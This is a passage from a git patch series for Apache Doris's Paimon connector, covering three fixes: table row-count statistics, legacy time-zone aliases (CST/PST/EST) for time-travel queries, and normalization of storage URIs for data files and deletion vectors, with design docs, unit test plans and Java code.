catalogOps.rowCount(resolveTable(paimonHandle)); + } catch (Exception e) { + LOG.warn("Failed to compute Paimon row count for {}", paimonHandle, e); + return Optional.empty(); + } + if (rowCount > 0) { + return Optional.of(new ConnectorTableStatistics(rowCount, -1)); + } + return Optional.empty(); // 0 rows -> UNKNOWN, legacy parity +} +``` + +**File 3 — `fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java`** (test fake — MUST implement the new seam method or the module won't compile) + +Add a configurable field + recorded method: + +```java +// ---- FIX-TABLE-STATS: row-count seam ---- +long rowCount; // configurable result +Table lastRowCountTable; // capture which table the metadata layer planned + +@Override +public long rowCount(Table table) { + log.add("rowCount"); + lastRowCountTable = table; + return rowCount; +} +``` + +No production code outside the connector module changes. `ConnectorStatisticsOps` / `ConnectorTableStatistics` / `PluginDrivenExternalTable.fetchRowCount` are already wired and need no edits — the gap was purely the missing override. + +# Risk Analysis + +- **Parity vs legacy**: Exact port. Legacy summed `split.rowCount()` over `newReadBuilder().newScan().plan().splits()` and returned `>0 ? n : -1`; the seam impl is identical and the metadata wrapper reproduces the `>0` gate and the 0→UNKNOWN mapping. The only intentional divergence is failure handling (legacy let the exception propagate up `fetchRowCount`; we return empty→-1). The user-visible result is the same fallback (-1) but we avoid surfacing a transient planning error as a query-killing exception during background stats collection — strictly safer, and aligned with the SPI's empty-if-unavailable contract and the module's other best-effort read paths. +- **dataSize**: -1 (UNKNOWN). Legacy never produced a base-table dataSize in `fetchRowCount`, so this is not a regression; any future dataSize work is additive. +- **Shared-code blast radius**: Adding a method to the `PaimonCatalogOps` interface forces every implementor to provide it. There are exactly two: `CatalogBackedPaimonCatalogOps` (production, updated) and `RecordingPaimonCatalogOps` (test, updated). I grepped the module; no other implementor exists. `ConnectorStatisticsOps` / `ConnectorTableStatistics` are untouched, so no other connector (JDBC, MaxCompute) is affected. `fetchRowCount` in fe-core is untouched. +- **Cost-model direction**: Going from a constant -1 to a real positive count CHANGES plans (re-enables join reorder, may flip broadcast/shuffle). This is the intended correction (restoring legacy behavior). It is a planning change, not a correctness change — results stay identical; only plan shape/perf moves toward the legacy baseline. +- **Edge cases**: + - Empty table (0 rows) → `rowCount==0` → empty → -1, matching legacy (which logged and returned -1). + - System tables → resolved via sys-aware `resolveTable`; `rowCount` plans the sys table's own splits. Closes Finding 5.1 with the same code path; no extra sys branch. + - Time-travel / branch handles: `resolveTable` honors the handle's pinned identity (branch/scan options already on the handle), so stats reflect the handle's view. In practice `fetchRowCount` is called on the base table object (analysis path), so the handle is the latest base — but the code is correct for any handle the SPI is asked about. + - Planning cost: each `getTableStatistics` call drives a real `plan()` (one remote scan-plan), same cost as legacy `fetchRowCount`. Called from analysis / SHOW paths, not per-query-hot, so acceptable and unchanged from legacy. + +# Test Plan + +## Unit Tests + +New test class `PaimonConnectorMetadataStatisticsTest` in `fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/`, driving a `RecordingPaimonCatalogOps` fake (no Mockito, fully offline), mirroring `PaimonConnectorMetadataMvccTest`'s `metadataWith(ops)` pattern. Each test FAILS before the fix (default SPI returns `Optional.empty()` for every input, so the positive-count and sys assertions fail) and PASSES after. + +Intent encoded (WHY, not just WHAT): + +1. **`positiveRowCount_returnedAsStatistics`** — `ops.rowCount = 42`; build a base `PaimonTableHandle` with `setPaimonTable(fakeTable)`; assert `getTableStatistics(...)` returns present with `getRowCount()==42` and `getDataSize()==-1`. WHY: a real positive count must reach the FE cost model (not -1) so join-reorder is not force-disabled. Also assert `ops.log` contains `"rowCount"` and `ops.lastRowCountTable == fakeTable`, proving the metadata layer planned the RESOLVED table (not some other handle) — locks the intent that stats are computed from the table the handle denotes. + +2. **`zeroRowCount_mapsToUnknownEmpty`** — `ops.rowCount = 0`; assert result is `Optional.empty()`. WHY: encodes the legacy 0→UNKNOWN(-1) contract; a future change that returned `(0,-1)` instead of empty would corrupt the FE which treats 0 as a real cardinality. This test fails if someone drops the `>0` gate. + +3. **`planningFailure_returnsEmptyNotThrow`** — a `RecordingPaimonCatalogOps` subclass (or a flag) whose `rowCount` throws `RuntimeException`; assert `getTableStatistics` returns `Optional.empty()` and does NOT propagate. WHY: stats collection must be best-effort; a transient remote failure must not kill the query/analysis. Locks the deliberate divergence from legacy's propagate-up behavior. + +4. **`systemTableUsesResolvedSysTable`** — build a sys handle via `PaimonTableHandle.forSystemTable(db, tbl, "snapshots", false)` with `setPaimonTable(sysFake)`; `ops.rowCount = 7`; assert present with rowCount==7 and `ops.lastRowCountTable == sysFake`. WHY: proves the single override serves system tables through the sys-aware `resolveTable` (closes Finding 5.1) — a future refactor that special-cased only normal tables would fail this. + +(`RecordingPaimonCatalogOps` gains the `rowCount` field + `lastRowCountTable` capture described above; `FakePaimonTable` is reused as-is — these tests never call `newReadBuilder()` because the seam is faked, which is the whole point of the seam.) + +## E2E Tests + +Live-only / CI-skipped, because a real row count requires a live paimon catalog with committed snapshots; the module's `PaimonLiveConnectivityTest` is the existing live harness and is not run in the offline gate. Recommended live regression (paimon p2 external suite, gated on a live paimon env): after `CREATE CATALOG` + `USE` a known paimon table with N committed rows, assert `SELECT COUNT(*)` and the reported stats agree — specifically that `SHOW TABLE STATUS`/`information_schema.tables.table_rows` reports N (not -1) for both a normal table AND a `tbl$snapshots` system table, matching the pre-migration (legacy) baseline. Note in the suite that this is a stats-only assertion (no row-correctness change) and that it must run against the same fixture used for the legacy parity baseline so any drift from legacy `fetchRowCount` is caught. This cannot run in the offline unit gate (no live catalog), hence CI-skipped/live-only. + +--- + +# ✅ IMPL SUMMARY (2026-06-11) + +**Status: DONE — build+UT green (PaimonConnectorMetadataStatisticsTest 4/0; PaimonConnectorMetadataMvccTest 37/0 unchanged; imports clean; HEAD uncommitted).** + +## Fix (3 production + 1 test-fake file, all in connector module; fe-core untouched) +- `PaimonCatalogOps.java`: added `long rowCount(Table)` to the interface + `import org.apache.paimon.table.source.Split`; implemented in `CatalogBackedPaimonCatalogOps` (sum `split.rowCount()` over `newReadBuilder().newScan().plan().splits()`). +- `PaimonConnectorMetadata.java`: added `import ConnectorTableStatistics` + the `getTableStatistics` override — resolves the table via the sys-aware `resolveTable`, calls `catalogOps.rowCount`, applies legacy `>0 ? n : UNKNOWN`, wraps `(rowCount, -1)`; best-effort `try/catch → Optional.empty()` on planning failure. +- `RecordingPaimonCatalogOps.java` (test fake): added `rowCount` / `lastRowCountTable` / `throwOnRowCount` + the `rowCount` override (required for module compile). + +## Tests (new `PaimonConnectorMetadataStatisticsTest`, 4): positive→stats(+lastRowCountTable proof), zero→empty, planning-failure→empty-not-throw, system-table→resolved-sys-table. + +## Notes +- Single override serves normal AND sys paimon tables via the sys-aware `resolveTable` (closes Finding 5.1; no separate sys path). +- dataSize left UNKNOWN(-1): legacy computed none here. +- The only two `PaimonCatalogOps` implementors (production `CatalogBackedPaimonCatalogOps`, test `RecordingPaimonCatalogOps`) both updated — verified no other implementor exists. + +## Live-e2e (gated, NOT run): SHOW TABLE STATUS / information_schema.tables.table_rows == N (not -1) for a normal table AND a `tbl$snapshots` sys table, against the legacy-parity fixture. diff --git a/plan-doc/tasks/designs/P5-fix-FIX-TZ-ALIAS-design.md b/plan-doc/tasks/designs/P5-fix-FIX-TZ-ALIAS-design.md new file mode 100644 index 00000000000000..fbeb1d942f11da --- /dev/null +++ b/plan-doc/tasks/designs/P5-fix-FIX-TZ-ALIAS-design.md @@ -0,0 +1,160 @@ +# Problem + +`FOR TIME AS OF ''` against a Paimon table fails with a `DorisConnectorException` whenever the session `time_zone` is a Doris zone alias that `java.time.ZoneId.of(String)` does not recognize — specifically **CST, PST, EST**. CST is Doris's default region alias for `Asia/Shanghai`, so this breaks datetime-string time-travel under the **default** configuration, not merely an edge case. + +Legacy (`fe-core` `PaimonUtil.getPaimonSnapshotByTimestamp`) resolved the *same* session-zone string successfully via the fe-core Doris alias map, so this is a parity regression introduced by the SPI cutover. + +Report reference: `plan-doc/reviews/P5-paimon-fullpath-review-2026-06-11.md` Finding 3.1 ("FOR TIME AS OF datetime-string 在 session time_zone CST/PST/EST 下失败, legacy 成功", MAJOR, CONFIRMED 3/0/0). + +# Root Cause (confirmed in current code) + +`PaimonConnectorMetadata.parseTimestampMillis` resolves the session zone with a bare, alias-less `ZoneId.of`: + +- `fe/fe-connector/fe-connector-paimon/.../PaimonConnectorMetadata.java:538-547` — `zoneId = java.time.ZoneId.of(session.getTimeZone());` inside a `try`, and on `DateTimeException` it throws a `DorisConnectorException` telling the user the zone "is not a standard zone id". There is **no alias map**. + +This is reached from `resolveTimeTravel` TIMESTAMP case at `PaimonConnectorMetadata.java:418-419` (`long millis = parseTimestampMillis(session, spec);`), for non-digital specs only (`spec.isDigital()` short-circuits at :530-531). + +Legacy path (still in tree), confirmed firsthand: +- `fe/fe-core/.../datasource/paimon/PaimonUtil.java:660` — `DateTimeUtils.parseTimestampData(timestamp, 3, TimeUtils.getTimeZone()).getMillisecond();` +- `fe/fe-core/.../common/util/TimeUtils.java:131-138` — `getTimeZone()` returns `TimeZone.getTimeZone(ZoneId.of(timezone, timeZoneAliasMap))`. +- `fe/fe-core/.../common/util/TimeUtils.java:106-117` — `timeZoneAliasMap` is built as `new TreeMap<>(String.CASE_INSENSITIVE_ORDER)` seeded with `ZoneId.SHORT_IDS` (`putAll`) and then overridden with exactly four entries: `CST -> Asia/Shanghai`, `PRC -> Asia/Shanghai`, `UTC -> UTC`, `GMT -> UTC`. + +The connector dropped the *entire* alias map (both `SHORT_IDS` and the 4 overrides), so `ZoneId.of` falls back to its native parsing, which rejects CST/PST/EST. + +### Correction to the report's literal suggestion (verified by JDK harness) + +The report's `suggestion` (line 111) says to inline **only the 4 explicit entries**. I ran a JDK harness (mirroring the reviewers' methodology) and proved that is **insufficient**: + +- 4-entry-only map: `ZoneId.of("CST",m)=Asia/Shanghai`, but `ZoneId.of("PST",m)` **THROWS** `ZoneRulesException` and `ZoneId.of("EST",m)` **THROWS**. +- Full legacy map (`SHORT_IDS` + 4 overrides, case-insensitive): `CST->Asia/Shanghai`, `PST->America/Los_Angeles`, `EST->-05:00`, `PRC->Asia/Shanghai`, `UTC->UTC`, `GMT->UTC`; truly-unknown ids (`XYZ`, `NOPE/ZZZ`) still THROW. + +So **PST and EST resolve via `ZoneId.SHORT_IDS`, not via the 4 puts.** The byte-faithful fix must replicate the *full* legacy map (`SHORT_IDS` overlaid with the 4 overrides, case-insensitive), or PST/EST — two of the three aliases the report names — remain broken. + +# Design + +Replicate the legacy `timeZoneAliasMap` as a small private static constant **inside the connector** (no fe-core import; `ZoneId.SHORT_IDS` is JDK-provided, and the 4 overrides are literal strings — exactly the "DLF inline keys" technique already used in B1). Then change the single `ZoneId.of(tz)` call to the two-arg `ZoneId.of(tz, ALIAS)` form, identical to legacy `TimeUtils.getTimeZone()`. + +Key decisions, justified: + +1. **Replicate the full map, not 4 entries.** Build `new TreeMap<>(String.CASE_INSENSITIVE_ORDER)`, `putAll(ZoneId.SHORT_IDS)`, then the 4 overrides — byte-identical to `TimeUtils` static initializer. This is the only construction that resolves CST/PST/EST exactly as legacy. + +2. **Case-insensitive**, matching legacy. `checkTimeZoneValidAndStandardize` (`TimeUtils.java:314`) validates `SET time_zone` against this case-insensitive map and stores the value as-entered, so any case Doris accepts must resolve here too. + +3. **Still fail loud on truly-unknown ids.** `ZoneId.of(tz, ALIAS)` throws `DateTimeException` for ids absent from the map; the existing `try/catch -> DorisConnectorException` is kept, so the "wrong zone -> wrong snapshot -> silently wrong rows" landmine the original comment warns about is still guarded for genuinely-unsupported ids. We only stop rejecting the ids legacy accepted. + +4. **No new dependency.** The connector module has no guava (verified). Use `java.util.TreeMap` + `java.util.Collections.unmodifiableMap` — the exact idiom already in `PaimonScanRange.java:72/96` and `PaimonTableHandle.java:124`. Keep `java.time.*` fully qualified inline, as the surrounding method already does (`java.time.ZoneId`, `java.time.DateTimeException`). + +5. **Surgical.** One new constant + one changed line + javadoc correction. No signature changes, no SPI changes, no other call sites (the only `ZoneId.of` in the connector is this one — verified). + +# Implementation Plan + +### File 1 — `PaimonConnectorMetadata.java` (connector main) + +**(a) Add a private static constant** (place it near the other private statics / above `parseTimestampMillis`, ~:528): + +```java +/** + * Doris session time-zone alias map, replicated from fe-core + * {@code TimeUtils.timeZoneAliasMap} (TimeUtils.java:106-117). The connector cannot import fe-core, + * so the map is rebuilt here byte-for-byte: {@link java.time.ZoneId#SHORT_IDS} (the JDK-provided + * short ids, which is where "PST"/"EST" resolve) overlaid with the four Doris overrides + * (CST/PRC -> Asia/Shanghai, UTC/GMT -> UTC). Case-insensitive, exactly like legacy, because + * {@code SET time_zone} stores the alias verbatim in any case. + */ +private static final Map SESSION_TIME_ZONE_ALIASES; + +static { + Map m = new java.util.TreeMap<>(String.CASE_INSENSITIVE_ORDER); + m.putAll(java.time.ZoneId.SHORT_IDS); + m.put("CST", "Asia/Shanghai"); + m.put("PRC", "Asia/Shanghai"); + m.put("UTC", "UTC"); + m.put("GMT", "UTC"); + SESSION_TIME_ZONE_ALIASES = java.util.Collections.unmodifiableMap(m); +} +``` + +(`Map` is already imported; `TreeMap`/`Collections`/`ZoneId` referenced fully-qualified to match the existing inline `java.time.*` style and avoid touching the import block. If preferred, `TreeMap`/`Collections` may instead be added to the existing `java.util.*` import group — both pass checkstyle; pick whichever the implementer finds cleaner, but keep `java.time.ZoneId` qualified since the method body already does.) + +**(b) Change the one resolution line** at `:540`: + +```java +// before +zoneId = java.time.ZoneId.of(session.getTimeZone()); +// after +zoneId = java.time.ZoneId.of(session.getTimeZone(), SESSION_TIME_ZONE_ALIASES); +``` + +**(c) Update the method javadoc** at `:512-526`. The current text frames CST/PST/EST as a "KNOWN LIMITATION" / deliberate fail-loud. Rewrite to: the connector replicates the legacy alias map so CST/PRC/UTC/GMT and the `SHORT_IDS` aliases (PST/EST/...) resolve byte-identically to legacy `TimeUtils.getTimeZone()`; the `try/catch -> DorisConnectorException` now fires only for ids absent from BOTH `ZoneId.of`'s native set AND the alias map (genuinely unsupported), preserving the "no silent degrade to a wrong zone" invariant. Keep the `millis < 0` guard note. + +### File 2 — `PaimonConnectorMetadataMvccTest.java` (connector test) + +The existing test `resolveTimestampStringWithUnsupportedZoneAliasThrowsClearError` (~:304-326) **encodes the now-wrong intent** ("CST must fail loud"). It must be updated as part of the fix (changing intent legitimately changes the test): + +- **Re-point the fail-loud test** to a genuinely-unknown id (e.g. `"XYZ"` or `"NOPE/ZZZ"`), keeping the `DorisConnectorException` + "standard"/"zone id" message assertions. This still pins the no-silent-degrade contract. +- **Add new parity tests** (see Test Plan) proving CST/PST/EST now resolve like legacy. + +# Risk Analysis + +- **Parity vs legacy:** After the change, `ZoneId.of(tz, SESSION_TIME_ZONE_ALIASES)` is the same call legacy makes via `TimeUtils.getTimeZone()` (`ZoneId.of(timezone, timeZoneAliasMap)`), and the downstream `DateTimeUtils.parseTimestampData(value, 3, TimeZone.getTimeZone(zoneId))` is identical to `PaimonUtil.java:660`. The map is a byte-for-byte replica of `TimeUtils.java:106-117`. Net effect: every id legacy accepted now resolves identically; ids legacy rejected still fail loud. +- **Blast radius:** Zero shared/fe-core code touched. The new constant is `private static` in one connector class; the only behavioral change is one extra arg to one `ZoneId.of` call reached only from `resolveTimeTravel`'s TIMESTAMP non-digital branch. Digital timestamps (`spec.isDigital()`, :530) never touch `ZoneId.of` and are unaffected (an existing test, `resolveTimestampDigitalUnaffectedByUnsupportedZoneAlias`, locks this). +- **`ZoneId.SHORT_IDS` stability:** It is a JDK-frozen constant (CST/PST/EST mappings are fixed). Legacy uses the same source, so the connector and legacy track each other across JDK versions automatically — no drift risk versus legacy. +- **Edge cases:** + - Offset ids (`+08:00`) and full IANA ids (`Asia/Shanghai`): pass through unchanged (resolved by `ZoneId.of`'s native parsing even with the map present) — verified. + - Case: legacy is case-insensitive; the replica `TreeMap(CASE_INSENSITIVE_ORDER)` matches. (Native `ZoneId.of` is case-sensitive, but Doris normally stores these aliases uppercase; matching legacy is the safe choice.) + - Truly-unknown id: still throws `DorisConnectorException` (no silent wrong-zone) — preserved, and re-tested. + - `millis < 0` guard at :550-551: untouched. +- **Why not the report's literal 4-entry suggestion:** it leaves PST/EST broken (proven by harness). Adopting it would partially "fix" the finding while silently leaving two of the three named aliases failing — a Rule 12 "fail loud" violation. Flagged for the reviewer in notes. + +# Test Plan + +## Unit Tests (connector test dir, no fe-core, no live cluster) + +All in `PaimonConnectorMetadataMvccTest.java`, reusing the existing `TzSession`, `RecordingPaimonCatalogOps`, `normalHandle`, `metadataWith`, and the byte-parity reference pattern already established by `resolveTimestampStringParsedWithSessionTimeZone` (:276-302) which captures `ops.snapshotIdAtOrBeforeArg`. + +1. **`resolveTimestampStringResolvesCstAliasToShanghai` (NEW)** — FAILS before (throws `DorisConnectorException`), PASSES after. + - `new TzSession("CST")`, literal `"2023-11-15 00:00:00"`, `spec.timestamp(literal, false)`. + - Reference: `expectedShanghai = DateTimeUtils.parseTimestampData(literal, 3, TimeZone.getTimeZone("Asia/Shanghai")).getMillisecond()` and `expectedUtc` for UTC; assert the two differ (test self-guard). + - Assert `ops.snapshotIdAtOrBeforeArg == expectedShanghai` (NOT `expectedUtc`). + - WHY comment: CST is Doris's default alias for `Asia/Shanghai`; legacy resolved it via the alias map. Pinning the *Shanghai* millis (not UTC, not a throw) is the byte-parity intent. MUTATION: alias-less `ZoneId.of` -> throws (red); a wrong override (CST->UTC) -> captures `expectedUtc` (red). + +2. **`resolveTimestampStringResolvesPstAndEstViaShortIds` (NEW)** — FAILS before, PASSES after. This is the test that specifically guards the report-suggestion correction. + - For `"PST"`: reference `DateTimeUtils.parseTimestampData(literal, 3, TimeZone.getTimeZone("America/Los_Angeles"))`; assert captured arg equals it. + - For `"EST"`: reference `TimeZone.getTimeZone(ZoneId.of("-05:00"))`; assert captured arg equals it. + - WHY comment: PST/EST resolve through `ZoneId.SHORT_IDS`, NOT the 4 explicit overrides; a fix that inlined only the 4 entries would leave these throwing. This test fails under both the buggy original AND the incomplete 4-entry "fix", and only passes when the full `SHORT_IDS`+overrides map is replicated. MUTATION: dropping `putAll(ZoneId.SHORT_IDS)` -> PST/EST throw (red). + +3. **`resolveTimestampStringWithGenuinelyUnknownZoneFailsLoud` (REPURPOSED from the existing `...UnsupportedZoneAliasThrowsClearError`)** — PASSES before and after (intent preserved, only the input changes from `"CST"` to a truly-unknown id). + - `new TzSession("NOPE/ZZZ")` (or `"XYZ"`); assert `DorisConnectorException` whose message contains the offending id and "standard" + "zone id". + - WHY comment: a zone id absent from BOTH `ZoneId.of`'s native set and the alias map must fail loud with actionable guidance — never silently degrade to a wrong zone (wrong snapshot -> silently wrong rows). The fix narrows the failure set to *genuinely* unknown ids; it must not become a silent UTC fallback. MUTATION: catching and degrading to UTC -> assertThrows finds nothing (red). + +4. **(Keep as-is)** `resolveTimestampDigitalUnaffectedByUnsupportedZoneAlias` (:328+) and `resolveTimestampStringParsedWithSessionTimeZone` (:276) — both must continue to pass, locking that the digital path bypasses `ZoneId.of` and that a standard IANA session zone is honored. + +## E2E Tests + +Live-only / CI-skipped (the connector module has no live Paimon cluster in unit CI; `PaimonLiveConnectivityTest` is the existing live harness). Manual / regression-suite reproduction: + +```sql +SET time_zone = 'CST'; +SELECT * FROM .. FOR TIME AS OF '2023-11-15 00:00:00'; +``` +Before: query fails with `DorisConnectorException` ("CST is not a standard zone id ..."). After: returns the at-or-before snapshot rows, identical to legacy (which resolves CST as `Asia/Shanghai`). Repeat with `SET time_zone='PST'` / `'EST'`. These belong in the paimon time-travel regression group (live, requires a real Paimon catalog with multiple snapshots), so they are not part of the connector unit suite; the unit tests above provide the byte-parity coverage deterministically without a cluster. + +--- + +# ✅ IMPL SUMMARY (2026-06-11) + +**Status: DONE — build+UT green (PaimonConnectorMetadataMvccTest 37/0; imports clean; HEAD uncommitted).** + +## Fix (1 production file: `PaimonConnectorMetadata.java`) +- Added `private static final Map SESSION_TIME_ZONE_ALIASES` built in a static block: `new TreeMap<>(String.CASE_INSENSITIVE_ORDER)` → `putAll(ZoneId.SHORT_IDS)` → 4 overrides (CST/PRC→Asia/Shanghai, UTC/GMT→UTC) → `Collections.unmodifiableMap`. **Full SHORT_IDS map per the HANDOFF correction** (4-entry-only leaves PST/EST throwing). +- Changed the single `ZoneId.of(session.getTimeZone())` → `ZoneId.of(session.getTimeZone(), SESSION_TIME_ZONE_ALIASES)`. +- Rewrote the method javadoc: removed the "KNOWN LIMITATION / CST·PST·EST fail-loud" framing; now states it resolves byte-identically to legacy `TimeUtils.getTimeZone()` and fail-loud fires only for ids absent from BOTH ZoneId.of's native set AND the map. Error message unchanged (still contains "standard"/"zone id"). + +## Tests (`PaimonConnectorMetadataMvccTest`) +- **Repurposed** `resolveTimestampStringWithUnsupportedZoneAliasThrowsClearError` → `resolveTimestampStringWithGenuinelyUnknownZoneFailsLoud` (input `"CST"`→`"XYZ"`; same DorisConnectorException + "standard"/"zone id" assertions — intent "fail loud on unknown" preserved). +- **Added** `resolveTimestampStringResolvesCstAliasToShanghai` (CST→Asia/Shanghai byte-parity) and `resolveTimestampStringResolvesPstAndEstViaShortIds` (PST→America/Los_Angeles, EST→-05:00 — the report-suggestion correction guard). + +## Deviation from design (Rule 9, documented) +The design said "keep `resolveTimestampDigitalUnaffectedByUnsupportedZoneAlias` as-is". I changed its session zone `"CST"`→`"XYZ"`. Rationale: after the fix CST RESOLVES, so a CST session would no longer prove the digital-bypass (the string path would parse fine too) — the test would pass even if someone removed the `spec.isDigital()` short-circuit, losing its mutation-catching power. `"XYZ"` still throws on the string path, so the test keeps discriminating. This is a faithful improvement, not a scope change. + +## Live-e2e (gated, NOT run): `SET time_zone='CST'/'PST'/'EST'; SELECT ... FOR TIME AS OF ''` against a live paimon catalog with multiple snapshots. From 77d4ed44d10e2e7b6a3732c56b181e4bc0ff8226 Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 11 Jun 2026 13:05:35 +0800 Subject: [PATCH 015/128] =?UTF-8?q?fix:=20FIX-URI-NORMALIZE=20=E2=80=94=20?= =?UTF-8?q?normalize=20native=20data-file=20+=20DV=20paths=20to=20BE=20can?= =?UTF-8?q?onical=20scheme?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: the paimon connector sent native ORC/Parquet data-file paths and deletion-vector (DV) paths to BE un-normalized. The paimon SDK emits warehouse-native schemes (oss://, cos://, obs://, s3a://, or the OSS bucket.endpoint authority form); BE's scheme-dispatched S3 file factory only recognizes s3://. On S3-compatible (non-AWS) warehouses this breaks native reads outright (B-7DF, data file) and silently drops the DV so DELETEd rows reappear (B-7DV, merge-on-read corruption). Legacy PaimonScanNode normalized both via the 2-arg LocationPath.of; the cutover dropped it. The two paths reach BE via different mechanisms (data-file through PluginDrivenSplit's single-arg LocationPath.of -> FileQueryScanNode:568; DV baked into thrift by the connector's populateRangeParams), so a fe-core-bridge-only fix cannot reach the DV path. Solution: new ConnectorContext.normalizeStorageUri SPI hook (identity default, mirroring vendStorageCredentials), implemented in DefaultConnectorContext via the engine's 2-arg normalizing LocationPath.of with the catalog's static storage map (threaded via a new lazy supplier + 4-arg ctor; PluginDrivenExternalCatalog wires it). The connector routes BOTH the data-file and DV paths through it inside the extracted, unit-testable buildNativeRange. JNI path untouched (carries its own FileIO). Fail-loud on un-normalizable paths (legacy parity). Static-vs-vended map scope noted in DV-025 (the pure-vended edge belongs to credential fixes #2/#3). Tests: fe-core DefaultConnectorContextNormalizeUriTest (oss->s3, s3 idempotent, null/blank, empty-map fail-loud); connector PaimonScanPlanProviderTest x3 (both paths normalized + call count, DV-less, no-context raw). paimon module 216/0/0, fe-core targeted green, checkstyle 0, import-gate clean. Live OSS+DV e2e CI-gated (not run). SPI RFC section 21 (E13), deviations DV-025. Also includes the round-2 review report + task list this fix derives from. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../paimon/PaimonScanPlanProvider.java | 67 ++- .../paimon/PaimonScanPlanProviderTest.java | 62 ++ .../paimon/RecordingConnectorContext.java | 16 + .../doris/connector/spi/ConnectorContext.java | 23 + .../connector/DefaultConnectorContext.java | 27 + .../PluginDrivenExternalCatalog.java | 3 +- ...faultConnectorContextNormalizeUriTest.java | 99 ++++ plan-doc/01-spi-extensions-rfc.md | 21 + plan-doc/deviations-log.md | 3 +- .../reviews/P5-paimon-rereview2-2026-06-11.md | 557 ++++++++++++++++++ plan-doc/task-list-P5-rereview2-fixes.md | 135 +++++ .../designs/P5-fix-URI-NORMALIZE-design.md | 111 ++++ 12 files changed, 1101 insertions(+), 23 deletions(-) create mode 100644 fe/fe-core/src/test/java/org/apache/doris/connector/DefaultConnectorContextNormalizeUriTest.java create mode 100644 plan-doc/reviews/P5-paimon-rereview2-2026-06-11.md create mode 100644 plan-doc/task-list-P5-rereview2-fixes.md create mode 100644 plan-doc/tasks/designs/P5-fix-URI-NORMALIZE-design.md diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index 1f7739657ae873..f254decf4c9534 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -262,27 +262,11 @@ public List planScan( // Native reader path List rawFiles = optRawFiles.get(); for (int i = 0; i < rawFiles.size(); i++) { - RawFile file = rawFiles.get(i); - String fileFormat = getFileFormatBySuffix(file.path()) - .orElse(defaultFileFormat); - - PaimonScanRange.Builder builder = new PaimonScanRange.Builder() - .path(file.path()) - .start(0) - .length(file.length()) - .fileSize(file.length()) - .fileFormat(fileFormat) - .partitionValues(partitionValues) - .schemaId(file.schemaId()); - - if (optDeletionFiles.isPresent() - && i < optDeletionFiles.get().size() - && optDeletionFiles.get().get(i) != null) { - DeletionFile df = optDeletionFiles.get().get(i); - builder.deletionFile(df.path(), df.offset(), df.length()); - } - - ranges.add(builder.build()); + DeletionFile deletionFile = + (optDeletionFiles.isPresent() && i < optDeletionFiles.get().size()) + ? optDeletionFiles.get().get(i) : null; + ranges.add(buildNativeRange( + rawFiles.get(i), deletionFile, defaultFileFormat, partitionValues)); } } else { // JNI reader path @@ -295,6 +279,47 @@ public List planScan( return ranges; } + /** + * Builds the native-reader {@link PaimonScanRange} for one raw ORC/Parquet file plus its optional + * deletion vector. BOTH the data-file path and the deletion-vector path are routed through + * {@link #normalizeUri} so BE's scheme-dispatched S3 factory receives canonical {@code s3://} + * URIs on OSS/COS/OBS/s3a warehouses (FIX-URI-NORMALIZE; legacy {@code PaimonScanNode} normalizes + * both via the 2-arg {@code LocationPath.of}). Package-private so both normalization sites are + * unit-testable without a live deletion-vector-bearing split. + */ + PaimonScanRange buildNativeRange(RawFile file, DeletionFile deletionFile, + String defaultFileFormat, Map partitionValues) { + String fileFormat = getFileFormatBySuffix(file.path()).orElse(defaultFileFormat); + PaimonScanRange.Builder builder = new PaimonScanRange.Builder() + .path(normalizeUri(file.path())) + .start(0) + .length(file.length()) + .fileSize(file.length()) + .fileFormat(fileFormat) + .partitionValues(partitionValues) + .schemaId(file.schemaId()); + if (deletionFile != null) { + builder.deletionFile( + normalizeUri(deletionFile.path()), deletionFile.offset(), deletionFile.length()); + } + return builder.build(); + } + + /** + * Normalizes a raw paimon-SDK storage URI (native data-file or deletion-vector path) into BE's + * canonical scheme via the engine ({@code oss://}/{@code cos://}/{@code obs://}/{@code s3a://} + * → {@code s3://}; OSS {@code bucket.endpoint} → {@code bucket}). Ports legacy + * {@code PaimonScanNode}'s 2-arg {@code LocationPath.of(path, storagePropertiesMap)} — BE's S3 + * file factory only recognizes {@code s3://}, so an un-normalized OSS/COS/OBS path fails the + * native read (data file) or silently drops the deletion vector (merge-on-read wrong rows). The + * connector cannot import fe-core's {@code LocationPath}, so it delegates to the + * {@link ConnectorContext#normalizeStorageUri} seam. With no context (offline unit tests) the raw + * path is preserved — same null-guard as the {@code vendStorageCredentials} overlay below. + */ + private String normalizeUri(String rawUri) { + return context != null ? context.normalizeStorageUri(rawUri) : rawUri; + } + @Override public Map getScanNodeProperties( ConnectorSession session, diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java index ff315b7852e3a9..b9322526a17bd7 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java @@ -33,6 +33,7 @@ import org.apache.paimon.table.sink.BatchWriteBuilder; import org.apache.paimon.table.sink.CommitMessage; import org.apache.paimon.table.source.DataSplit; +import org.apache.paimon.table.source.DeletionFile; import org.apache.paimon.table.source.RawFile; import org.apache.paimon.table.source.Split; import org.apache.paimon.types.DataTypes; @@ -187,6 +188,67 @@ public void nonForcedSplitWithoutNativeFilesTakesJni() { "a split without convertible raw files must route to JNI regardless of forceJni"); } + // ---- FIX-URI-NORMALIZE (B-7DF data file + B-7DV deletion vector) ---- + + @Test + public void nativeRangeNormalizesBothDataAndDeletionVectorPaths() { + RecordingConnectorContext ctx = new RecordingConnectorContext(); + PaimonScanPlanProvider provider = new PaimonScanPlanProvider( + new HashMap<>(), new RecordingPaimonCatalogOps(), ctx); + 